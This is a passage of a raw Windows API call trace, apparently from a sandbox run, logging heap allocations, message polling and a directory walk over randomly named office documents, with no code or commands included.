Flags=0x0, Size=0x4) returned 0x43e2170 [0073.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0073.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0073.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0073.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.811] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0073.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0073.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0073.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0073.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0073.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0073.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0073.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0073.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0073.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0073.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0073.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0073.812] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.812] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.812] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf873c8e0, ftCreationTime.dwHighDateTime=0x1d581e1, ftLastAccessTime.dwLowDateTime=0x4b1fe6e0, ftLastAccessTime.dwHighDateTime=0x1d5cfe5, ftLastWriteTime.dwLowDateTime=0x4b1fe6e0, ftLastWriteTime.dwHighDateTime=0x1d5cfe5, nFileSizeHigh=0x0, nFileSizeLow=0x6823, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="59kI0eZovuo4vI8.docx", cAlternateFileName="59KI0E~1.DOC")) returned 1 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391578 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0073.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0073.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0073.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391578 | out: hHeap=0x1780000) returned 1 [0073.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0073.812] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ccec8 [0073.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.813] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ccec8 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.813] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0073.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391578 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391578 | out: hHeap=0x1780000) returned 1 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0073.814] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.814] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbd0 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.814] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17e287a0, ftCreationTime.dwHighDateTime=0x1d5b731, ftLastAccessTime.dwLowDateTime=0x1212f6b0, ftLastAccessTime.dwHighDateTime=0x1d572fe, ftLastWriteTime.dwLowDateTime=0x1212f6b0, ftLastWriteTime.dwHighDateTime=0x1d572fe, nFileSizeHigh=0x0, nFileSizeLow=0x11972, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="AGO5jVFwME.pptx", cAlternateFileName="AGO5JV~1.PPT")) returned 1 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbd0 | out: hHeap=0x1780000) returned 1 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0073.814] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ccec8 [0073.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.815] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ccec8 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.815] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0073.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391578 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391578 | out: hHeap=0x1780000) returned 1 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0073.816] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.816] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.816] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfde3f130, ftCreationTime.dwHighDateTime=0x1d5bec0, ftLastAccessTime.dwLowDateTime=0xe3ed4f80, ftLastAccessTime.dwHighDateTime=0x1d5ee5c, ftLastWriteTime.dwLowDateTime=0xe3ed4f80, ftLastWriteTime.dwHighDateTime=0x1d5ee5c, nFileSizeHigh=0x0, nFileSizeLow=0x12292, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="aOtbGAAYxtk159gxW.xlsx", cAlternateFileName="AOTBGA~1.XLS")) returned 1 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391578 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0073.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0073.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0073.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391578 | out: hHeap=0x1780000) returned 1 [0073.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0073.816] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ccec8 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0073.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0073.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.816] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0073.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ccec8 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.817] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391578 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391578 | out: hHeap=0x1780000) returned 1 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.817] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.817] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0073.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.818] FindNextFileW (in: hFindFile=0x41ac240, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e188980, ftCreationTime.dwHighDateTime=0x1d5e2d5, ftLastAccessTime.dwLowDateTime=0x869ba5c0, ftLastAccessTime.dwHighDateTime=0x1d5e984, ftLastWriteTime.dwLowDateTime=0x869ba5c0, ftLastWriteTime.dwHighDateTime=0x1d5e984, nFileSizeHigh=0x0, nFileSizeLow=0x1149, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="CzDg7AgA6_wtvH.ods", cAlternateFileName="CZDG7A~1.ODS")) returned 1 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391578 [0073.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0073.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0073.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0073.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0073.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391578 | out: hHeap=0x1780000) returned 1 [0073.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0073.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0073.818] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, 